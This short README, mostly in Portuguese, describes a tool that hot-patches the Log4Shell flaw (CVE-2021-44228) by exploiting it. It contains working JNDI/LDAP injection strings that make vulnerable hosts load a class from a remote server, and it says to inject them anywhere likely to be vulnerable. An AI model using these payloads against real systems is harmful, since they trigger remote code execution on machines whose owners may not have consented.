
Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.
Hot-patch CVE-2021-44228 explorando a própria vulnerabilidade.
Injete o seguinte código em qualquer lugar provavelmente vulnerável ao CVE-2021-44228,
${jndi:ldap://your-own-server/patch}
Para evitar ataque MITM durante o processo de patch, o seguinte payload é recomendado, mas com menor compatibilidade para versões antigas do Java,
${jndi:ldap://your-own-server/any_string_except_patch}
Baixe a última versão
Especifique as variáveis de ambiente do sistema LOG4J_HOTFIX_HTTP_PATH e LOG4J_HOTFIX_HTTPS_PATH se você quiser hospedar o Hotfix.class em seu próprio servidor
Observe que o Hotfix.java deve ser compilado com JDK6 para máxima compatibilidade.